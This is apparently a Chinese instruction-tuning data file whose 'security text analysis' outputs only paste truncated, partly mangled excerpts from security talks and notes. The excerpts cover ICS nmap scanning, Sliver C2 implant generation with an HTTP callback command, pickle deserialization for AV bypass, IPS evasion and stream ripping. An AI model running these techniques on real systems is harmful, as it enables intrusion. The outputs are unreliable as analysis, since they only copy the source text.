|5006|Melsec-Q|nmap -script melsecq-discover-udp.nse -sU -p 5006 [host]| |956(TCP)|CSPV4|Unknown| |4840(TCP)|OPCUA|Unknown| |18245(TCP)|GE SRTP|Unknown| |1200(TCP)|Codesys|nmap script codesys-v2-discover.nse [host]| |10001|atg|nmap --script atg-info -p 10001 [host]| |2222|cspv4|nmap --script cspv4-info -p 2222 [host]| |1911|fox|nmap --script fox-info.nse -p 1911 [host]| |4800|moxa|nmap -sU --script moxa-enum -p 4800 [host]| |137|siemens wincc|sudo nmap -sU --script Siemens-WINCC.nse -p137 [host]| |445|stuxnet|nmap --script stuxnet-detect -p 445 [host]| 上述脚本并未完全整列了当前能够使用脚本信息未完待续中...... ### 基于工控组态软件的组件扫描方法 各工控厂商往往自带组态软件组态软件时连接当前内网内设备时可自主发现目标PLC设备 |端口|协议/设备|连接方法| |:-----|:------|:------| |102(TCP)|siemens s7|西", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved. Snort Plug-in Development: Teaching an Old Pig New Tricks Ben Feinstein, CISSP GCFA SecureWorks Counter Threat Unit DEFCON 16 August 8, 2008 The Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved.  Snort v2 Architecture & Internals  Snort Plug-in Development  Dynamic Rules  Dynamic Preprocessors  Snort Plug-in API  Examples, Pitfalls, Tips  Releasing two Dynamic Preprocessors  ActiveX Virtual Killbits (DEMO)  Debian OpenSSL Predictable PRNG Detection (DEMO) Whats In This Talk? The Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved.  Open-source IDS created by Marty Roesch  First released for *NIX platforms 1998  Commercialized by Sourcefire, Inc.  Snort Inline mode now available for IPS  Linux Bridge + Netfilter  Linux ip_queue and nf_queue interfaces  Snort v3 now making its way through Beta  NOT discussing plug-ins for v3  NOT discussing v3 architecture (ask Marty) Snort Basics The Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved.  Highly modularized for extensibility  Snort Rules & The Rules Matching Engine  SF Engine Dynamic Plug-in  Detection Plug-ins  implement/extend rules language  Output Plugins  Unified / Unified2  Syslog  Others  Preprocessors  Detection (i.e. alerting)  Normalization (i.e. decoding) Snort v2 Architecture The Basics The Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved.  Dynamic Preprocessors  Define a packet processing callback  Preprocessor local storage  Stream-local storage  Dynamic Rules  Writing Snort rules in C  v2.6.x (?), added ability to register a C callback  Before, only useful as form of rule obfuscation  Used by some commercial Snort rulesets  Relatively straight forward to RE using IDA Pro Snort v2 Architecture Run-time (Dynamic) Extensions The Information Security Experts Copyright  2008 SecureWorks, Inc. Al", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\napache 0x00 apacheapache 0x01 apache per-servervirtualhost per-directorydirectorylocationfile apache 0x02 mod_proxy AP_DECLARE_MODULE(proxy) = { STANDARD20_MODULE_STUFF, create_proxy_dir_config, /* create per-directory config structure */ merge_proxy_dir_config, /* merge per-directory config structures */ create_proxy_config, /* create per-server config structure */ merge_proxy_config, /* merge per-server config structures */ proxy_cmds, /* command table */ register_hooks }; static void *create_proxy_dir_config(apr_pool_t *p, char *dummy) { proxy_dir_conf *new = (proxy_dir_conf *) apr_pcalloc(p, sizeof(proxy_dir_conf)); /* Filled in by proxysection, when applicable */ /* Put these in the dir config so they work inside <Location> */ new->raliases = apr_array_make(p, 10, sizeof(struct proxy_alias)); new->cookie_paths = apr_array_make(p, 10, sizeof(struct proxy_alias)); new->cookie_domains = apr_array_make(p, 10, sizeof(struct proxy_alias)); new->error_override_codes = apr_array_make(p, 10, sizeof(int)); new->preserve_host_set = 0; new->preserve_host = 0; new->interpolate_env = -1; /* unset */ new->error_override = 0; new->error_override_set = 0; new->add_forwarded_headers = 1; new->add_forwarded_headers_set = 0; new->forward_100_continue = 1; new->forward_100_continue_set = 0; return (void *) new; } <directory /a> a 1 b 2 </directory> <directory /a/b> a 3 </dirctory> /a/b /a/b /a a a=3b=2 mergeproxymerge tatic void *merge_proxy_dir_config(apr_pool_t *p, void *basev, void *addv) { proxy_dir_conf *new = (proxy_dir_conf *) apr_pcalloc(p, sizeof(proxy_dir_conf)); proxy_dir_conf *add = (proxy_dir_conf *) addv; proxy_dir_conf *base = (proxy_dir_conf *) basev; new->p = add->p; new->p_is_fnmatch = add->p_is_fnmatch; new->r = add->r; new->refs = add->refs; /* Put these in the dir config so they work inside <Location> */ new->raliases = apr_array_append(p, base->raliases, add->raliases); new->cookie_paths = apr_array_append(p, base->cookie_paths, add->cookie_paths); new->cookie", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Docker > 笔记大部分内容来自 [docker_practice](https://github.com/yeasy/docker_practice) ,仅做内容排版修改 > 部分内容由 [xidaner](https://github.com/xidaner) 提供,仅做部分内容排版修改 --- **常见报错** - Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running? ```bash systemctl daemon-reload service docker restart ``` - docker timeout ```bash echo \"nameserver 8.8.8.8\" > /etc/resolv.conf sudo systemctl daemon-reload sudo systemctl restart docker ``` - 容器 \"Exited (0)\" 自动退出 - 有时镜像内置的执行命令无法正确执行于是容器就 Exited 了 - 尝试在 docker run 命令最后加上或删除 /bin/bash 选项 --- ## 镜像 **镜像管理** ```bash docker search [keyword] # 搜索镜像 docker image ls # 查看已下载的镜像列表 docker image rm [docker_image_id] # 删除本地的 docker 镜像 ``` **镜像体积** docker image ls 标识的所占用空间和在 Docker Hub 上看到的镜像大小不同 比如ubuntu:18.04 镜像大小显示是 63.3MB但是在 Docker Hub 显示的却是 25.47 MB这是因为 Docker Hub 中显示的体积是压缩后的体积在镜像下载和上传过程中镜像是保持着压缩状态的因此 Docker Hub 所显示的大小是网络传输中更关心的流量大小而 docker image ls 显示的是镜像下载到本地后展开的大小准确说是展开后的各层所占空间的总和因为镜像到本地后查看空间的时候更关心的是本地磁盘空间占用的大小 另外,docker image ls 列表中的镜像体积总和并非是所有镜像实际硬盘消耗由于 Docker 镜像是多层存储结构并且可以继承复用因此不同镜像可能会因为使用相同的基础镜像从而拥有共同的层由于 Docker 使用 Union FS相同的层只需要保存一份即可因此实际镜像硬盘占用空间很可能要比这个列表镜像大小的总和要小的多 ```bash docker system df # 查看镜像容器数据卷所占用的空间 ``` **虚悬镜像** 镜像列表中可能存在一个特殊的镜像这个镜像既没有仓库名也没有标签均为 `<none>` 这种镜像原本是有镜像名和标签的比如原来为 mongo:3.2随着官方镜像维护发布了新版本后重新 docker pull mongo:3.2 时mongo:3.2 这个镜像名被转移到了新下载的镜像身上而旧的镜像上的这个名称则被取消从而成为了 <none>除了 docker pull 可能导致这种情况docker build 也同样可以导致这种现象由于新旧镜像同名旧镜像名称被取消从而出现仓库名标签均为 <none> 的镜像这类无标签镜像也被称为 虚悬镜像(dangling image) 可以用下面的命令专门显示这类镜像 ```bash docker image ls -f dangling=true ``` 一般来说虚悬镜像已经失去了存在的价值是可以随意删除的可以用下面的命令删除 ```bash docker image prune ``` **中间层镜像** 为了加速镜像构建重复利用资源Docker 会利用 中间层镜像所以在使用一段时间后可能会看到一些依赖的中间层镜像默认的 docker image ls 列表中只会显示顶层镜像如果希望显示包括中间层镜像在内的所有镜像的话需要加 -a 参数 ```bash docker image ls -a ``` 这样会看到很多无标签的镜像与之前的虚悬镜像不同这些无标签的镜像很多都是中间层镜像是其它镜像所依赖的镜像这些无标签镜像不应该删除否则会导致上层镜像因为依赖丢失而出错实际上这些镜像也没必要删除因为之前说过相同的层只会存一遍而这些镜像是别的镜像的依赖因此并不会因为它们被列出来而多存了一份无论如何你也会需要它们只要删除那些依赖它们的镜像后这些依赖的中间层镜像也会被连带删除 ### commit 编辑镜像 ```bash docker run --na", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMicro-Renovator Bringing Processor Firmware up to Code Bio Matt (a.k.a. Syncsrc)  Recovering EE / CompE  Builder and user of hardware debug features  Uses BIOS and UEFI interchangeably  Currently responsible for platform security of a cloud  Religiously updates firmware  Formerly a product security validation lead at Intel Background Background - Patches for Spectre & Meltdown  Meltdown  PTI (Linux), KVA Shadow (Windows)  Spectre v1  Lfence (forced serialization)  Spectre v2  Retpoline (pollutes BTB) - An incomplete fix, per Intel  IBRS & IBPB (new MSRs to control BTB)  Microcode updates are necessary to expose these new MSRs What is Microcode?  Can be thought of as Processor Firmware  A Brief History of Microprogramming  Can be patched to fix bugs & errata  However, processors dont have any non-volatile storage  Any applied patches are lost on reset or power-down  Stored and applied by the BIOS or Operating System  Reloaded on every boot, reset, S3 resume, etc...  Intel 64 and IA-32 Architectures SDM Volume 3A, section 9.11.6 Obtaining Microcode Patches  From BIOS Updates  MacBook and Surface users are covered  From Operating System Updates  Linux: redistributed by most distros (via microcode_ctl.rpm or intel-microcode.deb)  Users can also download microcode.dat directly from Intel  Microsoft didnt start distributing microcode until 2 months after it was released  Still only distributing for some processor and Windows versions  Patches existed, but were impossible to apply to many systems Systems Unable to Patch Spectre  Still no way to mitigate Spectre v2 on millions of systems  Other than buying a new OS (or a new computer)  Windows PCs that are 3 to 9 years old *  Mostly shipped with Windows 7 or 8 pre-installed  BIOS updates delayed or unavailable  3rd-party microcode update drivers are ineffective * CPUs more than 9 years old are not receiving microcode updates from Intel Systems Unable to Patch Spectre CPU BIOS Updates Windows 7 & 8 Windows 10 8th Gen Availab", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage com.b1ngz.sec.model; /** * Created by b1ngz on 2018/9/8. */ public class Target { private Object param; public Object getParam() { return param; } public void setParam(Object param) { this.param = param; } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAPK 流量转发保姆级教程 作者lings- 时间2021/10/02 目 录 绪 论 ............................................................................................................... 1 第 1 章 Burpsuite 证书安装 ........................................................................... 2 1.1 导出 burpsuite 证书 ............................................................................ 2 1.2 将 Burpsuite 证书放置于 Apache2 服务器 ....................................... 3 1.3 下载证书并将证书导入 system 证书目录 ........................................ 3 1.4 若提示权限不足则执行如下命令获取 root 权限 .................... 5 第 2 章 Clash 软件安装及配置 ...................................................................... 6 2.1 下载 Clash ........................................................................................... 6 2.2 编辑配置文件 ..................................................................................... 6 2.2.1 文件内容 ................................................................................... 6 2.2.2 文件格式及修改 ....................................................................... 6 2.3 安装 Clash ........................................................................................... 6 2.4 配置 Clash ........................................................................................... 6 2.4.1 拖入夜神模拟器导入 ............................................................... 6 2.4.2 Apache2 服务器下载导入 ......................................................... 6 2.5 设计全局代理 ..................................................................................... 6 2.6 设置抓取单个 APP 流量 .................................................................... 6 第 3 章 Proxifier 代理配置 ............................................................................ 7 3.1 配置 Windows 全局代理 .................................................................... 7 3.2 添加安卓模拟器流量转发 ................................................................. 8 3.3 Windows 不能上网 .............................................................................. 8 APK 流量转发保姆级教程 lings- 20", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCDnetsec.com Education Masters Degrees in:  Computer Science  Management Author since 2007 Professional Penetration Testing Ninja Hacking Netcat Power Tools Penetration Testings Open Source Toolkit, V2 Certifications ISSMP, CISSP, SCSECA, SCNA, SCSA, IEM/IAM Crystal Defense Network Security Solutions - CDnetsec.com Education Masters Degrees:  Computer Science  Organizational Behavior Co-Founder and Operations Manager for Crystal Defense Network Security Solutions MSSP on the Colorado Front Range Crystal Defense Network Security Solutions - CDnetsec.com Learn to identify and evade an Intrusion Prevention System Understand how an IPS is typically deployed, and identify non-typical deployments Rules, rules, rules COTS IPS systems Crystal Defense Network Security Solutions - CDnetsec.com Pre-installed Kali Linux Prefer to have it as the main OS, not virtualized CAT5 cable of sufficient length We didnt know in advance how the rooms would be, so please bear with us when we get everyone connected Patience 4 hours, 4 tasks, a LOT of network congestion This is a HOSTILE NETWORK!! HackingDojo.com Do / Dont Everyone is here to learn, so dont impede others Embrace other peoples genius Workshop = Group Effort, work as a team Workshop != Taking over someone elses keyboard Were here to learn, not be pedantic over terms 99% will be done via shared screen  please make sure you can see the presentation HackingDojo.com Lab configuration for the workshop Crystal Defense Network Security Solutions - CDnetsec.com COTS IDS/IPS products Rules Encryption and tunneling Timing attacks Traffic manipulation Resource consumption* Crystal Defense Network Security Solutions - CDnetsec.com Lets begin! Crystal Defense Network Security Solutions - CDnetsec.com Any feedback, please send to: info@CDnetsec.com Crystal Defense Network Security Solutions - CDnetsec.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSliver 是一个基于Go的开源跨平台的红队平台可供各种规模的组织用于执行安全测试 Sliver 的木马 支持 C2 over Mutual-TLSHTTP(S) 和 DNS等协议 implant可以时时编译生成并会使 用证书进行加密 基于Go语言的特性服务器和客户端以及implant都支持 MacOSWindows 和 Linux Github地址:https://github.com/BishopFox/sliver tag:v1.4.22 go语言越来越流行并且作为红队使用语言有很多优势它十分简单代码可以轻松编译为native代码 到各类平台跨平台开发非常容易像py2exe和jar2exe因为没有流行的软件它们生成的工具很容 易被杀毒针对而golang编写的软件像docker等让杀软无法直接查杀golang语言本身的特征这更方 便红队开发进行隐藏自己 重要的是已经有很多开源的成熟的用于红队的代码sliver就是其中之一所以学习下sliver的代 码主要积累一些相关的go代码学习基于go的C2是怎么做的方便之后自己写C2 本文将主要总结Sliver c2的功能原理代码结构以及对抗方面的内容 使用&简介 sliver运行需要配置一些环境变量如gogcc方便生成木马时候进行编译在kali下运行十分简单 因为kali已经内置了这些变量只需要在下载页面https://github.com/BishopFox/sliver/releases 下载 最新的 sliver-server_linux 解压后直接运行即可 输入 http -l 8888 用于开启一个基于http 8888端口的C2 输入 generate --http http://192.168.126.132:8888 生成一个基于http的c2木马 它生成的时候默认会使用 garble 对implant源码进行一遍混淆能够防止被分析 sliver之前的版本使用的gobfuscate在源码层面修改变量以及代码结构速度比较慢相比之下 garble是对中间编译环节进行混淆结构速度比较快也能混淆大部分符号等信息 生成完毕后的exe被点击后 使用 use [id] 选择要控制的机器即可对它进行操控了 代码简介 sliver的代码结构中有三大组件 implant 植入物有点拗口可以理解为木马 server teamserver也可以进行交互操作 client 多用户时可以使用的交互客户端 这三个组件即构成了Sliver的C2服务server也实现了client的功能client就是使用rpc调用server的功 能所以大部分情况下看server和implant就行了 官方Readme上的一些Features和它的实现方式 Dynamic code generation 动态代码生成就是动态生成go源码然后编译 Compile-time obfuscation 使用go-obf混淆生成的go代码 Multiplayer-mode 支持多用户模式 Staged and Stageless payloads Staged 主要是调用msf来生成的payload Procedurally generated C2 over HTTP(S) http混淆协议 Base64 Base64 with a custom alphabet so that it's not interoperable with standard Base64 Hex Standard hexadecimal encoding with ASCII characters Gzip Standard gzip English Encodes arbitrary data as English ASCII text PNG Encodes arbitrary data into valid PNG image files Gzip+English A combination of the Gzip and English encoders Base64+Gzip A combination of the Base64 and Gzip encoders [DNS canary] blue team detection 使用DNS诱饵域名 发现蓝队 Secure C2 over mTLS, WireGuard, HTTP(S), and DNS C2通信支持的协议 mTLS, WireGuard, HTTP(S), DNS Fully scriptable using JavaScript/TypeScript or Python 支持使用JavaScript和Python编写脚本 Local and remote pr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n!!!!Replay!Attacks!on!Ethereum!Smart!Contracts Zhenxuan!Bai,!Yuwei!Zheng,!!Kunzhe!ChaiSenhua!Wang About!us  360!Technology!is!a!leading!Internet!security!company!in!China.!Our!core! products!are!anti-virus!security!software!for!PC!and!cellphones.!  UnicornTeam!(https://unicorn.360.com/)!was!built!in!2014.!This!is!a!group! that!focuses!on!the!security!issues!in!many!kinds!of!wireless! telecommunication!systems.!The!team!also!encourage!members!to!do!other! research!that!they!are!interested!in.!  Highlighted!works!of!UnicornTeam!include:!  Low-cost!GPS!spoofing!research!(DEFCON!23)!  LTE!redirection!attack!(DEFCON!24)!  Attack!on!power!line!communication!(Black!Hat!USA!2016) PPTwww.1ppt.com/moban/!!!!!!!!!!!!!!!!!!PPTwww.1ppt.com/sucai/! PPTwww.1ppt.com/beijing/!!!!!!!!!!!!!!!!!!!PPTwww.1ppt.com/tubiao/!!!!!!! PPTwww.1ppt.com/xiazai/!!!!!!!!!!!!!!!!!!!!!PPTwww.1ppt.com/powerpoint/!!!!!!! www.1ppt.com/ziliao/!!!!!!!!!!!!!!!!!!!www.1ppt.com/fanwen/!!!!!!!!!!!!!! www.1ppt.com/shiti/!!!!!!!!!!!!!!!!!!!!!www.1ppt.com/jiaoan/!!!!!!!!!!!!!!!! PPTwww.1ppt.cn!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!PPTwww.1ppt.com/kejian/!! www.1ppt.com/kejian/yuwen/!!!!www.1ppt.com/kejian/shuxue/!! www.1ppt.com/kejian/yingyu/!!!!www.1ppt.com/kejian/meishu/!! www.1ppt.com/kejian/kexue/!!!!!www.1ppt.com/kejian/wuli/!! www.1ppt.com/kejian/huaxue/!!www.1ppt.com/kejian/shengwu/!! www.1ppt.com/kejian/dili/!!!!!!!!!!www.1ppt.com/kejian/lishi/!!!!!!!!! Part!1 Part!2 Part!3 Part!4 The!Main!Idea Back!Ground! Demonstration Safety!Problem Replay!Attack Part!1 Back Ground Blockchain & smart contract & Ethereum What is Blockchain? Blockchain is: A!Large-scale!globally!decentralized!computer! network!! A!system!that!users!can!interact!with!by!sending! transactions! !Transactions!are!guaranteed!by! Consensus!Mechanism! Advantages of Blockchain  having!the!unified!database!with!rapid!consensus!  With!large-scale!fault-tolerant!mechanism!  Not!relying!on!trust,!not!controlled!by!any!single!administrator!or! organiz", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeyond the Lulz: Black Hat Trolling, White Hat Trolling, and Hacking the Attention Landscape SECTION 1 Are you familiar with fishing? Trolling is where you set your fishing lines in the water and then slowly go back and forth dragging the bait and hoping for a bite. Trolling on the Net is the same concept - someone baits a post and then waits for the bite on the line and then enjoys the ensuing fight. - Anonymous usenet poster, 1995 (relayed by Judith Donath, Identity and Deception in the Virtual Community, 1998) The well-constructed troll is a post that induces lots of newbies and flamers to make themselves look even more clueless than they already do, while subtly conveying to the more savvy and experienced that it is in fact a deliberate troll. If you don't fall for the joke, you get to be in on it. - Trollers FAQ by trollfaq@altairiv.demon.co.uk, 1996 Being a prick on the internet because you can. Typically unleashing one or more cynical or sarcastic remarks on an innocent by-stander, because its the internet and, hey, you can. - EREALLY GUD DEFUNITION MAKUR, Urban Dictionary, 2004 A smart vendor treats vulnerabilities less as a software problem, and more as a PR problem. So if we, the user community, want software vendors to patch vulnerabilities, we need to make the PR problem more acute. - Bruce Schneier, 2007 Laughter at the expense or misfortune of others. - A troll to Gabriella Coleman, Hacker, Hoaxer, Whistleblower, Spy, 2014 Part of: a rich aesthetic tradition of spectacle and transgression... which includes the irreverent legacy of phreakers and the hacker underground. - Gabriella Coleman, Phreaks, Hackers, and Trolls: The Politics of Transgression and Spectacle, 2012 The best challenge to the authority of something is to find where its semantic or enforceable borders break down and to exploit those shortcomings. - Brad Troemel, proclaimed the Troll of Internet Art, 2012 Weve come up with the menacing term 'troll' for someone who spreads hate and does o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1998 Andries Brouwer .\\\" .\\\" This is free documentation; you can redistribute it and/or .\\\" modify it under the terms of the GNU General Public License as .\\\" published by the Free Software Foundation; either version 2 of .\\\" the License, or (at your option) any later version. .\\\" .\\\" The GNU General Public License's references to \"object code\" .\\\" and \"executables\" are to be interpreted as the output of any .\\\" document formatting or typesetting system, including .\\\" intermediate and printed output. .\\\" .\\\" This manual is distributed in the hope that it will be useful, .\\\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\\\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\\\" GNU General Public License for more details. .\\\" .\\\" You should have received a copy of the GNU General Public .\\\" License along with this manual; if not, write to the Free .\\\" Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111, .\\\" USA. .\\\" .TH GLOB 7 \"12 June 1998\" \"Unix\" \"Linux Programmer's Manual\" .SH NAME glob \\- 形成路径名称 .SH \"描述 (DESCRIPTION)\" 很久以前 在 UNIX V6 版 中 有一个 程序 .I /etc/glob 用来 展开 通配符模板. 不久以后 它 成为 shell 内建功能. 现在 人们 开发了 类似的 库函数 .BR glob (3), 让 用户程序 实现 同样的 功能. 此 规则 遵循 (POSIX 1003.2, 3.13). .SH \"通配符匹配 (WILDCARD MATCHING)\" 包含 '?', '*' 或 '[' 字符的 字符串 称为 通配符模板(wildcard pattern). 形成路径名(globbing) 指 一种 操作, 把 通配符模板 展开为 匹配 该串的 路径名. 匹配 定义为: 不在 方括弧中 的 '?' 匹配 任意 单个 字符. 不在 方括弧中 的 '*' 匹配 任意 字符串, 包括 空串. .SS \"字符集 (Character classes)\" 对于 表达式 `[...]', 如果 在 第一个 '['符 后面 出现的 第一个 字符 不是 '!', 则 该 表达式 匹配 任意 一个 在 `[...]'内 出现的 字符. 方括弧内 不能 有 空串, 因此 ']' 可以 作为 第一个 字符 出现在 方括弧内. (像 这样, '[][!]' 匹配 下列 三个 字符 中的 任意 一个, '[', ']' 和 '!'.) .SS \"范围集 (Ranges)\" 字符集 有一个 特例: 用 '-' 分开的 两个 字符 表示 一个 范围集. (像 这样, `[A-Fa-f0-9]' 等于 `[ABCDEFabcdef0123456789]'.) 把 '-' 放到 方括弧内 的 开头 或 最后 可以 获得 它的 本意. (像 这样, `[]-]' 匹配 ']'和'-' 中 任意 一个. 而 `[--/]' 匹配 `-', `.' 和`/'中 任意 一个.) .SS \"补集 (Complementation)\" 表达式 '[!...]' 表示 一个 字符, 该 字符 不匹配 方括弧内 去掉 开头 '!' 后 的 表达式. (像 这样, `[!]a-]' 匹配 除了 ']'", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### Canary介绍 Canary 的意思是金丝雀来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子工人们每次下井都会带上一只金丝雀如果井下的气体有毒金丝雀由于对毒性敏感就会停止鸣叫甚至死亡从而使工人们得到预警 我们知道通常栈溢出的利用方式是通过溢出存在于栈上的局部变量从而让多出来的数据覆盖 ebpeip 等从而达到劫持控制流的目的栈溢出保护是一种缓冲区溢出攻击缓解手段当函数存在缓冲区溢出攻击漏洞时攻击者可以覆盖栈上的返回地址来让 shellcode 能够得到执行当启用栈保护后函数开始执行的时候会先往栈底插入 cookie 信息当函数真正返回的时候会验证 cookie 信息是否合法(栈帧销毁前测试该值是否被改变)如果不合法就停止程序运行(栈溢出发生)攻击者在覆盖返回地址的时候往往也会将 cookie 信息给覆盖掉导致栈保护检查失败而阻止 shellcode 的执行避免漏洞利用成功在 Linux 中我们将 cookie 信息称为 Canary 由于 stack overflow 而引发的攻击非常普遍也非常古老相应地一种叫做 Canary 的 mitigation 技术很早就出现在 glibc 里直到现在也作为系统安全的第一道防线存在 Canary 不管是实现还是设计思想都比较简单高效就是插入一个值在 stack overflow 发生的高危区域的尾部当函数返回之时检测 Canary 的值是否经过了改变以此来判断 stack/buffer overflow 是否发生 Canary 与 Windows 下的 GS 保护都是缓解栈溢出攻击的有效手段它的出现很大程度上增加了栈溢出攻击的难度并且由于它几乎并不消耗系统资源所以现在成了 Linux 下保护机制的标配 ### 在 GCC 中使用 Canary 可以在 GCC 中使用以下参数设置 Canary: ``` -fstack-protector 启用保护不过只为局部变量中含有数组的函数插入保护 -fstack-protector-all 启用保护为所有函数插入保护 -fstack-protector-strong -fstack-protector-explicit 只对有明确 stack_protect attribute 的函数开启保护 -fno-stack-protector 禁用保护 ``` ### Canary 实现原理 开启 Canary 保护的 stack 结构大概如下 ``` High Address | | +-----------------+ | args | +-----------------+ | return address | +-----------------+ rbp => | old ebp | +-----------------+ rbp-8 => | canary value | +-----------------+ | local variables | Low | | Address ``` 当程序启用 Canary 编译后在函数序言部分会取 fs 寄存器 0x28 处的值存放在栈中 %ebp-0x8 的位置 这个操作即为向栈中插入 Canary 值代码如下 ```asm mov rax, qword ptr fs:[0x28] mov qword ptr [rbp - 8], rax ``` 在函数返回之前会将该值取出并与 fs:0x28 的值进行异或如果异或的结果为 0说明 Canary 未被修改函数会正常返回这个操作即为检测是否发生栈溢出 ```asm mov rdx,QWORD PTR [rbp-0x8] xor rdx,QWORD PTR fs:0x28 je 0x4005d7 <main+65> call 0x400460 <__stack_chk_fail@plt> ``` 如果 Canary 已经被非法修改此时程序流程会走到 `__stack_chk_fail``__stack_chk_fail` 也是位于 glibc 中的函数默认情况下经过 ELF 的延迟绑定定义如下 ```C eglibc-2.19/debug/stack_chk_fail.c void __attribute__ ((noreturn)) __stack_chk_fail (void) { __fortify_fail (\"stack smashing detected\"); } void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg) { /* The loop is added only to keep gcc happy. *", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBreaking the Chrome Sandbox with Mojo _tsuro@, 2022 No memory was corrupted in the making of this presentation Kernel Browser Process Renderer Renderer Renderer Renderer Network GPU Renderer Browser Process Network URLLoader NetworkService NetworkContext ... RendererHost BlobRegistry GpuHost ... Renderer Browser Process Network URLLoader NetworkService NetworkContext ... RendererHost BlobRegistry GpuHost ... Renderer Browser Process Port X Port Y Port Z ... Port A Port B Port C ... To: X REQUEST_INTRODUCTION INTRODUCE BROADCAST_EVENT ACCEPT_INVITATION Data Data Data Data EVENT_MESSAGE EVENT_MESSAGE ... Data EVENT_MESSAGE kUserMessage kMergePort ... port_name port_name port_name Data Data Data OffensiveCon 2020 - Popping Calc with Hardware Vulnerabilities Leaking ports == bad ? Browser Renderer Network ? 0 ! ! ! ! 0 ! ? Socket is closed Browser process Delete peer node Node name reused Destroy all ports with peer Browser thread 2 Prepare to send message Read node name from port Send message (to wrong node) ? 1. leak port name 2. spoof message Socket is closed Browser process Delete peer node Node name reused Destroy all ports with peer Network Process Port OnError handlers Send PortClosed events ChildProcessHost: kill(child) Socket is closed Port OnError handlers ChildProcessHost: exit() Destroy all ports with peer Delete peer node I have a dangerous fascination with terrible bugs. @halvarflake Socket is closed Browser process Delete peer node Node name reused Destroy all ports with peer Network Process Port OnError handlers Send PortClosed events ChildProcessHost: kill(child) Socket is closed Port OnError handlers ChildProcessHost: exit() Destroy all ports with peer Delete peer node These are tasks on the IO thread Socket is closed Browser process Delete peer node Node name reused Destroy all ports with peer Port OnError handlers Send PortClosed events ChildProcessHost: kill(child) Network Process Socket is closed Port OnError handlers ChildProcessHost: exit() Destr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 反序列化 --- ```py import pickle class A(object): a = 1 b = 2 def run(self): print(self.a,self.b) print(pickle.dumps(A())) ``` Python 中也有类似的方法可以使其在被反序列化的时候执行这里以 `__reduce__` 为例 ```py import pickle class A(object): a = 1 b = 2 def __reduce__(self): return (print, (self.a+self.b,)) print(pickle.dumps(A())) ``` 通过 pickle 的 loads 来反序列化并自动执行 ```py import pickle ret = b'\\x80\\x03cbuiltins\\nprint\\nq\\x00K\\x03\\x85q\\x01Rq\\x02.' pickle.loads(ret) ``` 我们可以看到我们已经将我们的 a+b 自动输出了这里也可以提示我们pickle 的 loads 参数如果可以被控制我们就可以进行利用 我们这里可以对其进行混淆编码操作依旧以 Base64 编码为例我们序列化代码如下 ```py import pickle import base64 class A(object): a = 1 b = 2 def __reduce__(self): return (print, (self.a+self.b,)) ret = pickle.dumps(A()) ret_base64 = base64.b64encode(ret) print(ret_base64) ``` 接下来我们只需要进行反序列化调用之前先进行解码操作即可 ```py import pickle import base64 ret = b'gANjYnVpbHRpbnMKcHJpbnQKcQBLA4VxAVJxAi4=' ret_decode = base64.b64decode(ret) pickle.loads(ret_decode) ``` --- ## Source & Reference - [利用加载器以及Python反序列化绕过AV](https://www.echocipher.life/index.php/archives/648/)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRipping Media Off of the Wire A Step-by-Step Guide A Step-by-Step Guide By Honey honey.rtmp@gmail.com whoami: Honey is a Network Administrator for 4+ years a Research Assistant for a Ballistic research grant by the NIST an Adjunct Professor at John Jay College of Criminal an Adjunct Professor at John Jay College of Criminal Justice, located in NYC gaining her Masters degree in Forensic Computing has worked in the IT industry for the past 9+ years. holds a Computer of Information Systems B.S. dual A.A.S. degrees in Industrial Electronic Engineering and Computer Networking Scope: Download MP3s from Discussion of lack of security of protected streaming implementations Tools: wget version 1.11.4i Mozilla Firefox version 3.6.3ii an add-on for Mozilla Firefox called: HttpFox version 0.8.4iii 0.8.4iii rtmpdump version 2.1b for windowsiv Convert FLV to MP3 version 1.0 * All tools used are available for use under the GNU license. Specific versions are cited although may not be required Disclosure: This presentation describes methods to download protected materials in an effort raise awareness of the various weaknesses that exist within each implementation. implementation. All music/media used in this demonstration has the appropriate permissions for use by the musical artists themselves. Any illegal use of the following methods by third parties is the sole responsibility of the third party. The author of this presentation bares no legal responsibility for misuse of 